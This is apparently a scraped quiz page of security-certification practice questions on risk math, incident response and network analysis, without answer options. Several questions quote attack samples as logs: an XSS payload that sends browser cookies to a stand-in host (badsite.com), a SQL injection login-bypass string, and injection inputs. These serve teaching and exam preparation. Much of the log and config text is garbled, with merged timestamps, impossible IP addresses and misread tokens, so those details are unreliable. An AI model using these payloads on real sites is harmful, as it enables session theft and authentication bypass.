Its About Company Quiz

236 Questions | Attempts: 196
Share
Please wait...
Question 1 / 200
0 %
0/100
Score 0/100
1. The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. Internal services that are normallyavailable to the public via the Internet are inaccessible, and employees in the office are unable to browse the Internet. The senior security engineer starts by reviewing thebandwidth at the border router, and notices that the incoming bandwidth on the route(s external interface is maxed out. The security engineer then inspects the followingpiece of log to try and determine the reason for the downtime, focusing on the company's external routers IP which is 128.20.176.19:11:16:22.110343 IP 90237.31.27.19 > 128.20.176.19.19: UDP, length 140011:16:22.110351IP23.27. 112.200.19 > 128.20.176.19.19: UDP, length 140011:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 140011:16:22. 110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 140011:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration?
Submit
Please wait...
About This Quiz
Its About Company Quiz - Quiz

.

Tell us your name to personalize your report, certificate & get on the leaderboard!
2. A firm's Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify complex vulnerabilities that may exist in a payment system being internallydeveloped . The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product. The CEO highlighted that code base confidentiality is of critical importance to allow the company to exceed the competition in terms of the product's reliability, stability , and performance.Which of the following would provide the MOST thorough testing and satisfy the CE O's requirements?
Submit
3. The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer's (CSO) request to harden the corporate network's perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary?
Submit
4. A multi-national company has a highly mobile workforce and minimal IT infrastructure. The company utilizes a BYOD and social media policy to integrate presencetechnology into global collaboration tools by individuals and teams. As a result of the dispersed employees and frequent international travel, the company is concernedabout the safety of employees and their families when moving in and out of certain countries. Which of the following could the company view as a downside of usingpresence technology?
Submit
5. The helpdesk is receiving multiple calls about slow and intermittent Internet access from the finance department. The following information is compiled:Caller 1, IP 172.16.35.217, NETMASK 255.255.254.0Caller 2, IP 172.16.35.53, NETMASK 255.255.254.0Caller 3, IP 172.16.35.173, NETMASK 255.255.254.0All callers are connected to the same switch and are routed by a router with five built~n interfaces. The upstream router interface's MAC is 00-01-42-32·ab-1aA packet capture shows the following:09:05:15.934840 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)09:06:16.124850 arp reply 172.16.34.1 is-at 00:01:42:32:ab: 1a (00:01:42:32:ab:1a)09:07:25.439811 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)09:08:10.937590 IP172.16.35.1 > 172.16.35.255: ICMP echo request, id 2305, seq 1, length 6553409:08:10.937591 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2306, seq 2, length 6553409:08:10.937592 IP172.16.35.1 > 172.16.35.255: ICMP echo request, id 2307, seq 3, length 65534Which of the following is occurring on the network?
Submit
6. A security administrator is performing VDI traffic data collection on a virtual server which migrates from one host to another. While reviewing the data collected by theprotocol analyzer, the security administrator notices that sensitive data is present in the packet capture. Which of the following should the security administratorrecommend to ensure the confidentiality of sensitive information during live VM migration, while minimizing latency issues?
Submit
7. Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect forcompany XYZ is reviewing a vendor proposal to reduce company XYZ's hardware costs by combining multiple physical hosts through the use of virtualization technologies.The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning Pll, and administrative complexity on the proposal. Whichof the following BEST describes the core concerns of the security architect?
Submit
8. In a situation where data is to be recovered from an attacker's location, which of the following are the FIRST things to capture? (Select TWO).
Submit
9. An application present on the majority of an organization's 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?
Submit
10. Using SSL, an administrator wishes to secure public facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the following is the number of wildcard SSL certificates that should be purchased?
Submit
11. Which of the following activities is commonly deemed "OUT OF SCOPE" when undertaking a penetration test?
Submit
12. During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply with policy. Six months later, the company is audited for compliance toregulations. The audit discovers that 40 percent of the desktops do not meet requirements. Which of the following is the MOST likely cause of the noncompliance?
Submit
13. Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. How should the employees request access to shared resources before theauthentication integration is complete?
Submit
14. A system administrator has just installed a new Linux distribution. The distribution is configured to be "secure out of the box". The system administrator cannot make updates to certain system files and services. Each time changes are attempted, they are denied and a system error is generated. Which of the following troubleshooting steps should the security administrator suggest?
Submit
15. An intruder was recently discovered inside the data center, a highly sensitive area. To gain access, the intruder circumvented numerous layers of physical and electronic security measures. Company leadership has asked for a thorough review of physical security controls to prevent this from happening again. Which of the following departments are the MOST heavily invested in rectifying the problem? (Select THREE).
Submit
16. Due to compliance regulations, a company requires a yearly penetration test. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology. Which of the following would be the advantage of conducting this kind of penetration test?
Submit
17. A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001 ::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action?
Submit
18. A well-known retailer has experienced a massive credit card breach. The retailer had gone through an audit and had been presented with a potential problem on their network. Vendors were authenticating directly to the retailer's AD servers, and an improper firewall rule allowed pivoting from the AD server to the DMZ where credit card servers were kept. The firewall rule was needed for an internal application that was developed, which presents risk. The retailer determined that because the vendors were required to have site to site VPN's no other security action was taken.To prove to the retailer the monetary value of this risk, which of the following type of calculations is needed?
Submit
19. An administrator wishes to replace a legacy clinical software product as it has become a security risk. The legacy product generates $10,000 in revenue a month. The newsoftware product has an initial cost of $180,000 and a yearly maintenance of $2,000 after the first year. However, it will generate $15,000 in revenue per month and be moresecure. How many years until there is a return on investment for this new package?
Submit
20. A company has a difficult time communicating between the security engineers, application developers, and sales staff. The sales staff tends to overpromise the applicationdeliverables. The security engineers and application developers are falling behind schedule. Which of the following should be done to solve this?
Submit
21. A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a system compromise from malware. Currently, the company projects a total cost of $50,000 for the next three years responding to and eradicating workstation malware. The Information Security Officer (ISO) has received three quotes from different companies that provide HIPS. The first quote requires a $10,000 one-time fee, annual cost of $6 per workstation, and a 10% annual support fee based on the number of workstations. The second quote requires a $15,000 one-time fee, an annual cost of $5 per workstation, and a 12% annual fee based on the number of workstations. The third quote has no one-time fee, an annual cost of $8 per workstation, and a 15% annual fee based on the number of workstations.Which solution should the company select if the contract is only valid for three years?
Submit
22. The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. The Chief Information Officer (CIO) wants to determinewhich additional controls must be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. Which of the followingBEST describes the scenario presented and the document the ISO is reviewing?
Submit
23. A trucking company delivers products all over the country. The executives at the company would like to have better insight into the location of their drivers to ensure theshipments are following secure routes. Which of the following would BEST help the executives meet this goal?
Submit
24. A security analyst, Ann, states that she believes Internet facing file transfer servers are being attacked. Which of the following is evidence that would aid Ann in making a case to management that action needs to be taken to safeguard these servers?
Submit
25. Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information?
Submit
26. The IT Security Analyst for a small organization is working on a customer's system and identifies a possible intrusion in a database that contains Pll. Since Pll is involved, the analyst wants to get the issue addressed as soon as possible. Which of the following is the FIRST step the analyst should take in mitigating the impact of the potential intrusion?
Submit
27. A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution hasbeen in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has been broken up into eight primary stages,with each stage requiring an in-depth risk analysis before moving on to the next phase. Which of the following software development methods is MOST applicable?
Submit
28. A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware. Which of the following is theNEXT step that the security team should take?
Submit
29. A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?
Submit
30. A company has decided to change its current business direction and refocus on core business. Consequently, several company sub-businesses are in the process of being sold-off. A security consultant has been engaged to advise on residual information security concerns with a de-merger. From a high-level perspective, which of the following BEST provides the procedure that the consultant should follow?
Submit
31. An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management softwareapplication. The assessor submitted the report to senior management but nothing has happened. Which of the following would be a logical next step?
Submit
32. A large organization has recently suffered a massive credit card breach. During the months of Incident Response, there were multiple attempts to assign blame for whose fault it was that the incident occurred. In which part of the incident response phase would this be addressed in a controlled and productive manner?
Submit
33. An insurance company is looking to purchase a smaller company in another country. Which of the following tasks would the security administrator perform as part of the security due diligence?
Submit
34. The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromisecorporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of thefollowing equipment MUST be deployed to guard against unknown threats?
Submit
35. Two universities are making their 802.11n wireless networks available to the other university's students. The infrastructure will pass the student's credentials back to the home school for authentication via the Internet.The requirements are:Mutual authentication of clients and authentication server The design should not limit connection speedsAuthentication must be delegated to the home school No passwords should be sent unencryptedThe following design was implemented:-WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security-RADIUS proxy servers will be used to forward authentication requests to the home school-The RADIUS servers will have certificates from a common public certificate authorityA strong shared secret will be used for RADIUS server authenticationWhich of the following security considerations should be added to the design?
Submit
36. A pentester must attempt to crack passwords on a windows domain that enforces strong complex passwords. Which of the following would crack the MOST passwords inthe shortest time period?
Submit
37. ABC Corporation has introduced token-based authentication to system administrators due to the risk of password compromise. The tokens have a set of HMAC counterbasedcodes and are valid until they are used. Which of the following types of authentication mechanisms does this statement describe?
Submit
38. A bank has decided to outsource some existing IT functions and systems to a third party service provider. The third party service provider will manage the outsourcedsystems on their own premises and will continue to directly interface with the bank's other systems through dedicated encrypted links. Which of the following is critical toensure the successful management of system security concerns between the two organizat ions?
Submit
39. VPN users cannot access the active FTP server through the router but can access any server in the data center.Additional network information:DMZ network 192.168.5.0/24 (FTP server is 192.168.5. 11) VPN network 192.168.1.0/24Datacenter 192.168.2.0/24User network - 192.168.3.0/24HR network 192.168.4 .0/24\Traffic shaper configuration:VLAN Bandwidth Limit (Mbps)VPN 50User 175HR 250Finance 250Guest 0Router ACL:Action Source DestinationPermit 192.168.1.0/24 192.168.2.0/24Permit 192.168.1.0/24 192.168.3.0/24Permit 192.168.1.0/24 192.168.5.0/24Permit 192.168.2.0/24 192.168.1.0/24Permit 192.168.3.0/24 192.168.1.0/24Permit 192.168.5.1/32 192.168.1.0/24Deny 192.168.4 .0/24 192.168.1.0/24Deny 192.168.1.0/24 192.168.4 .0/24Deny any anyWhich of the following solutions would allow the users to access the active FTP server?
Submit
40. The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. The documentation shows that a single 24 hours downtime in a critical business function will cost the business $2.3 million. Additionally, the business unit which depends on the critical business function has determined that there is a high probability that a threat will materialize based on historical data. The CIO's budget does not allow for full system hardware replacement in case of a catastrophic failure, nor does it allow for the purchase of additional compensating controls. Which of the following should the CIO recommend to the finance director to minimize financial loss?
Submit
41. It has come to the IT administrator's attention that the "post your comment" field on the company blog page has been exploited, resulting in cross-site scripting attacksagainst customers reading the blog. Which of the following would be the MOST effective at. preventing the "post your comment" field from being exploited?
Submit
42. Ann, a systems engineer, is working to identify an unknown node on the corporate network. To begin her investigative work, she runs the following nmap command string:user@hostname:-$ sudo nmap 0 192.168.1.54Based on the output, nmap is unable to identify the OS running on the node, but the following ports are open on the device:TCP/22TCP/ 111TCP/512-514TCP/2049TCP/32778Based on this information, which of the following operating systems is MOST likely running on the unknown node?
Submit
43. The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so theadministrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur?
Submit
44. ODBC access to a database on a network-connected host is required. The host does not have a security mechanism to authenticate the incoming ODBC connection, and the application requires that the connection have read/write permissions. In order to further secure the data, a nonstandard configuration would need to be implemented. The information in the database is not sensitive, but was not readily accessible prior to the implementation of the ODBC connection. Which of the following actions should be taken by the security analyst?
Submit
45. The DLP solution has been showing some unidentified encrypted data being sent using FTP to a remote server. A vulnerability scan found .a collection of Linux servers thatare missing OS level patches. Upon further investigation, a technician notices that there are a few unidentified processes running on a number of the servers. What wouldbe a key FIRST step for the data security team to undertake at this point?
Submit
46. A security manager has received the following email from the Chief Financial Officer (CFO):'While I am concerned about the security of the proprietary financial data in our ERP application, we have had a lot of turnover in the accounting group and I am having adifficult time meeting our monthly performance targets. As things currently stand, we do not allow employees to work from home but this is something I am willing to allowso we can get back on track. What should we do first to securely enable this capability for my group?" Based on the information provided, which of the following would bethe MOST appropriate response to the CFO?
Submit
47. A security manager looked at various logs while investigating a recent security breach in the data c enter from an external source. Each log below was collected from various security devices compiled from a report through the company's security information and event management server.L·ogs:L0og 1:Feb 5 23:55:37.743: %SEC-6-IPACCESSLOGS: list 10 denied 10.2.5.81 3 packetsLog 2:HTIP://www.company.com/index.php?user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaLog 3:Security Error AlertEvent ID 50: The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the clientLog 4:Encoder oe ;;; new OracleEncoder ();String query = "Select user_id FROM user_ data WHERE user_name = · "+ oe.encode ( req.getParamet er("userlD")) +" · and user_password = · "+ oe. encode (req.getParameter("pwd")) +" · ";VulnerabilitiesBuffer overflowSOL injectionACLXSSWhich of the following logs and vulnerabilities would MOST likely be related to the security breach? (Select TWO).
Submit
48. An administrator believes that the web servers are being flooded with excessive traffic from time to time. The administrator suspects that these traffic floods correspond towhen a competitor makes major announcements. Which of the following should the administrator do to prove this theory?
Submit
49. An industry organization has implemented a system to allow trusted authentication between all of its partners. The system consists of a web of trusted RADIUS servers communicating over the Internet. An attacker was able to set up a malicious server and conduct a successful man-in-the-middle attack. Which of the following controls should be implemented to mitigate the attack in the future?
Submit
50. Company ABC is hiring customer service representatives from Company XYZ. The representatives reside at Company XYZ's headquarters. Which of the following BESTprevents Company XYZ representatives from gaining access to unauthorized Company ABC systems?
Submit
51. Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim's privilege level.The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?
Submit
52. A human resources manager at a software development company has been tasked with recruiting personnel for a new cyber defense division in the company. This divisionwill require personnel to have high technology skills and industry certifications. Which of the following is the BEST method for this manager to gain insight into this industryto execute the task?
Submit
53. Select id, firstname, lastname from authorsUser input= firstname= Hack;manlastname=JohnsonWhich of the following types of attacks is the user attempting?
Submit
54. A small company is developing a new Internet-facing web application. The security requirements are:1. Users of the web application must be uniquely identified and authenticated.2. Users of the web application will not be added to the company's directory services.3. Passwords must not be stored in the code.Which of the following meets these requirements?
Submit
55. A new piece of ransomware got installed on a company's backup server which encrypted the hard drives containing the OS and backup application configuration but did not affect the deduplication data hard drives.During the incident response, the company finds that all backup tapes for this server are also corrupt. Which of the following is the PRIMARY concern?
Submit
56. A security administrator wants to calculate the ROI of a security design which includes the purchase of new equipment. The equipment costs $50,000 and it will take 50 hours to install and configure the equipment. The administrator plans to hire a contractor at a rate of $100/hour to do the installation. Given that the new design and equipment will allow the company to increase revenue and make an additional $100,000 on the first year, which of the following is the ROI expressed as a percentage for the first year?
Submit
57. The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the country for the sales staff to generate business. The company needs aneffective communication solution to remain in constant contact with each other, while maintaining a secure business environment. A junior-level administrator suggests thatthe company and the sales staff stay connected via free social media. Which of the following decisions is BEST for the CEO to make?
Submit
58. The telecommunications manager wants to improve the process for assigning company-owned mobile devices and ensuring data is properly removed when no longer needed. Additionally, the manager wants to onboard and offboard personally owned mobile devices that will be used in the BYOD initiative. Which of the following should be implemented to ensure these processes can be automated? (Select THREE)
Submit
59. Since the implementation of IPv6 on the company network, the security administrator has been unable to identify the users associated with certain devices utilizing IPv6addresses, even when the devices are centrally managed.en1: flags=8863<UP,BROAOCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 ether 18: 1e:af:ab: 10:a3inet6 fw80::fa1e :dfff:fee6:9d8%en1 prefixlen 64 scopeid Ox5 inet 192.168.1.14 netmask OxffffffOO broadcast 192.168.1.255 inet6 2001:200:5:922:1035:dfff:fee6:9dfe prefixlen64 autoconf inet6 2001:200:5:922:10ab:5e21:aa9a:6393 prefixlen 64 autoconf temporary nd6 options=1<PERFORMNUD>media: autoselectstatus: .activeGiven this output, which of the following protocols is in use by the company and w'hat can the system administrator do to positively map users with 1Pv6 addresses in thefuture? (Select TWO).
Submit
60. A company provides on-demand cloud computing resources for a sensitive project. The company implements a fully virtualized datacenter and terminal server access withtwo-factor authentication for customer access to the administrative website. The security administrator at the company has uncovered a breach in data confidentiality.Sensitive data from customer A was found on a hidden directory within the VM of company B. Company B is not in the same industry as company A and the two are notcompetitors. Which of the following has MOST likely occurred?
Submit
61. A security administrator is tasked with increasing the availability of the storage networks while enhancing the performance of existing applications. Which of the followingtechnologies should the administrator implement to meet these goals? (Select TWO).
Submit
62. Executive management is asking for a new manufacturing control and workflow automation solution. This application will facilitate management of proprietary informationand closely guarded corporate trade secrets.The information security team has been a part of the department meetings and come away with the following notes:-Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employee managementapplication, a cloud- based Saas application.-Sales is asking for easy order tracking to facilitate feedback to customers. -Legal is asking for adequate safeguards to protect trade secrets. They are also concerned withdata ownership questions and legal jurisdiction.-Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with additional steps or overhead. System interaction needs to bequick and easy. -Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. They would like read-onlyaccess to the entire workflow process for monitoring and baselining.The favored solution is a user friendly software application that would be hosted onsite. It has extensive ACL functionality, but also has readily available APls forextensibility. It supports read-only access, kiosk automation, custom fields, and data encryption.Which of the following departments' request is in contrast to the favored solution?
Submit
63. A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution hasbeen in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has been broken up into eight primary stages,with each stage requiring an in-depth risk .analysis before moving on to the next phase. Which of the following software development methods is MOST applicable?
Submit
64. During an incident involving the company main database, a team of forensics experts is hired to respond to the breach. The team is in charge of collecting forensics evidence from the company's database server.Which of the following is the correct order in which the forensics team should engage?
Submit
65. Which of the following provides the BEST risk calculation methodology?
Submit
66. A company Chief Information Officer (CIO) is unsure which set of standards should govern the company's IT policy. The CIO has hired consultants to develop use cases totest against various government and industry security standards. The CIO is convinced that there is large overlap between the configuration checks and security controlsgoverning each set of standards. Which of the following selections represent the BEST option for the CIO?
Submit
67. A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company's online shop~ng application_ Based on heuristic information from the Security Operations Center(SOC). a Denial of Service Attack (DoS) has been successfully executed 5 times a year. The Business Operations department has determined the loss associated to each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation?
Submit
68. A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem?
Submit
69. A mature organization with legacy information systems has incorporated numerous new processes and dependencies to manage security as its networks and infrastructure are modernized. The Chief Information Office has become increasingly frustrated with frequent releases, stating that the organization needs everything to work completely, and the vendor should already have those desires built into the software product. The vendor has been in constant communication with personnel and groups within the organization to understand its business process and capture new software requirements from users. Which of the following methods of software development is this organization's configuration management process using?
Submit
70. Due to compliance regulations, a company requires a yearly penetration test. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology.Which of the following would be the advantage of conducting this kind of penetration test?
Submit
71. A security manager is looking into the following vendor proposal for a cloud-based SIEM solution. The intention is that the cost of the SIEM solution will be justified by having reduced the number of incidents and therefore saving on the amount spent investigating incidents.Proposal:External cloud-based software as a service subscription costing $5,000 per month. Expected to reduce the number of current incidents per annum by 50%.The company currently has ten security incidents per annum at an average cost of $10,000 per incident. Which of the following is the ROI for this proposal after three years?
Submit
72. A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Which of the followingcontrols has likely been implemented by the developers?
Submit
73. A company sales manager received a memo from the company's financial department which stated that the company would not be putting its software products throughthe same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. The memo also stated that the marketingmaterial and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the upcoming year and identified anincreased target across the software products that will be affected by the financial department's change. All software products will continue to go through new developmentin the coming year. Which oft.he following should the sales manager do to ensure the company stays out of trouble?
Submit
74. An IT manager is working with a project manager from another subsidiary of the same multinational organization. The project manager is responsible for a new software development effort that is being outsourced overseas, while customer acceptance testing will be performed in house. Which of the following capabilities is MOST likely to cause issues with network availability?
Submit
75. A security auditor suspects two employees of having devised a scheme to steal money from the company. While one employee submits purchase orders for personalitems, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegalactivities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activityoccurring in the future?
Submit
76. The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during theyear. A risk analyst reports to the risk manager that the asset value of the business system is $120,000 and. based on industry data, the exposure factor to fires is only20% due to the fire suppression system installed at the site. Fires occur in the area on average every four years. Which of the following is the ALE?
Submit
77. A security administrator was recently hired in a start -up company to represent the interest of security and to assist the network team in improving security in the company.The programmers are not on good terms with the security team and do not want to be distracted with security issues while they are working on a major project. Which ofthe following is the BEST time to make them address security issues in the project?
Submit
78. An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management softwareapplication. The assessor submitted the report to senior management but nothing has happened. Which of the following would be a logical next step?
Submit
79. A system worth $100,000 has an exposure factor of eight percent and an ARO of four. Which of the following figures is the system's SLE?
Submit
80. The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. Thehelpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Given that the helpdesk staff is locatedwithin the company headquarters and 90% of the callers are telecommuters, which of the· following tools should the helpdesk manager use to make the staff more effectiveat troubleshooting while at the same time reducing company costs? (Select TWO).
Submit
81. The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing, systemlog gathering, chat, hardware logging, inventory management, and remote registry access. The risk management team has been asked to review vendor responses to theRFQ. Which of the following questions is the MOST important?
Submit
82. An IT manager is concerned about the cost of implementing a web filtering solution in an effort to mitigate the risks associated with malware and resulting data leakage .Given that the ARO is twice per year, the ALE resulting from a data leak is $25,000 and the ALE after implementing the web filter is $15,000. The web filtering solution willcost the· organization $10,000 per year. Which of the following values is the single loss expectancy of a data leakage event after implementing the web filtering solution?
Submit
83. A port in a fibre channel switch failed, causing a costly downtime on the company's primary website. Which of the following is the MOST likely cause of the downtime?
Submit
84. In an effort to minimize costs, the management of a small candy company wishes to explore a cloud service option for the development of ~s online applications. The company does not wish to invest heavily in IT infrastructure. Which of the following solutions should be recommended?
Submit
85. ABC Corporation uses multiple security zones to protect systems and information, and all of the VM hosts are part of a consolidated VM infrastructure. Each zone has different VM administrators. Which of the following restricts different zone administrators from directly accessing the console of a VM host from another zone?
Submit
86. A company is trying to decide how to manage hosts in a branch location connected via a slow WAN link. The company desires to provide the same level of performanceand functionality to the branch office as it provides to the main campus. The company uses Active Directory for its directory service and host configuration management.The branch location does not have a datacenter, and the physical security posture of the building is weak. Which of the following designs is MOST appropriate for thisscenario?
Submit
87. Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method. Which of the following methodologies should be adopted?
Submit
88. After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart.SELECT ITEM FROM CART WHERE fTEM=ADDSLASHES($USERINPUT);The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart's items?
Submit
89. After the install process, a software application executed an on line activation process. After a few months, the system experienced a hardware failure. A backup image of the system was restored on a newer revision of the same brand and model device . After the restore, the specialized application no longer works. Which of the following is the MOST likely cause of the problem?
Submit
90. An investigator wants to collect the most volatile data first in an incident to preserve the data that runs the highest risk of being lost. After memory, which of the following BEST represents the remaining order of volatility that the investigator should follow?
Submit
91. A company has issued a new mobile device policy permitting BYOD and company-issued devices. The company-issued device has a managed middleware client that restricts the applications allowed on company devices and provides those that are approved. The middleware client provides configuration standardization for both company owned and BYOD to secure data and communication to the device according to industry best practices. The policy states that, "BYOD clients must meet the company's infrastructure requirements to permit a connection." The company also issues a memorandum separate from the policy, which provides instructions for the purchase, installation, and use of the middleware client on BYOD. Which of the following is being described?
Submit
92. After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of thefollowing would help meet these goals by having co-workers occasionally audit another worker's position?
Submit
93. A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important?
Submit
94. The security engineer receives an incident ticket from the helpdesk stating that DNS lookup requests are no longer working from the office. The network team has ensured that Layer 2 and Layer 3 connectivity are working. Which of the following tools would a security engineer use to make sure the DNS server is listening on port 53?
Submit
95. A developer has implemented a piece of client-side JavaScript code to sanitize a use(s provided input to a web page login screen. The code ensures that only the upper case and lower case letters are entered in the username field, and that only a 6-digit PIN is entered in the password field. A security administrator is concerned with the following web server log:10.235.62.11 -[02/Mar/2014:06:13:04] "GET /site/script.php?user=admin&pass=pass%20or %201=1 HTTP/1.1" 200 5724Given this log, which of the following is the security administrator concerned with and which fix should be implemented by the developer?
Submit
96. A security administrator notices the following line in a server's security log:<input name='credentials' type=TEXT value="" +request .getParameter('><script>document.location='https://badsite.com/? q='document.cookie</script>') + '";The administrator is concurred that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the securityadministrator implement to prevent this particular attack?
Submit
97. A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition andlogical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?
Submit
98. A security manager for a service provider has approved two vendors for connections to the service provider backbone. One vendor will be providing authentication servicesfor its payment card service, and the other vendor will be providing maintenance to the service provider infrastructure sites. Which of the following business agreements isMOST relevant to the vendors and service provider's relationship?
Submit
99. The network administrator at an enterprise reported a large data leak. One compromised server was used to aggregate data from several critical application servers and send it out to the Internet using HTTPS. Upon investigation, there have been no user logins over the previous week and the endpoint protection software is not reporting any issues. Which of the following BEST provides insight into where the compromisedserver collected the information?
Submit
100. Ann is testing the robustness of a marketing website through an intercepting proxy. She has intercepted the fo llowing HTTP request:POST /login.aspx HTTP/1.1Host: comptia.orgContent-type: text/htmltxtUsername=ann&txtPassword=ann&alreadyloggedln=false&submit=trueWhich of the fo llowing should Ann perform to test whether the website is susceptible to a simple authentication bypass?
Submit
101. A senior network security engineer has been tasked to decrease the attack surface of the corporate network. Which of the following actions would protect the externalnetwork interfaces from external attackers performing network scanning?
Submit
102. An administrator is implementing a new network-based storage device. In selecting a storage protocol, the administrator would like the data in transit's integrity to be the most important concern. Which of the following protocols meets these needs by implementing either AES-CMAC or HMAC-SHA256 to sign data?
Submit
103. An administrator is tasked with securing several website domains on a web server. The administrator elects to secure www.example.com, mail.example.org, archive.example.com, and www.example.org with the same certificate. Which of the following would allow the administrator to secure those domains with a single issued certificate?
Submit
104. A Chief Financial Officer (CFO) has raised concerns with the Chief Information Security Officer (CISO) because money has been spent on IT security infrastructure, but corporate assets are still found to be vulnerable. The business recently funded a patch management product and SOE hardening initiative. A third party auditor reported findings against the business because some systems were missing patches.Which of the following statements BEST describes this situation?
Submit
105. A completely new class of web-based vulnerabilities has been discovered. Claims have been made that all common web-based development frameworks are susceptible to attack. Proof-of-concept details have emerged on the Internet. A security advisor within a company has been asked lo provide recommendations on how lo respond quickly to these vulnerabilities. Which of the following BEST describes how the security advisor should respond?
Submit
106. An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. After the upgrade, an unauthorized intrusion into the system was detected. The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly. Which of the following has been overlooked in securing the system? (Select TWO).
Submit
107. There have been some failures of the company's internal facing website. A security engineer has found the W/lf- to be the root cause of the failures. System logs show that the WAF has been unavailable for 14 hours over the past month, in four separate situations. One of these situations was a two hour scheduled maintenance time, aimed at improving the stability of the WAF. Using the MTTR based on the last month's performance figures, which of the following calculations is the percentage of uptime assuming there were 722 hours in the month?
Submit
108. A university requires a significant increase in web and database server resources for one week, twice a year, to handle student registration. The web servers remain idle for the rest of the year. Which of the following is the MOST cost effective way for the university to securely handle student registration?
Submit
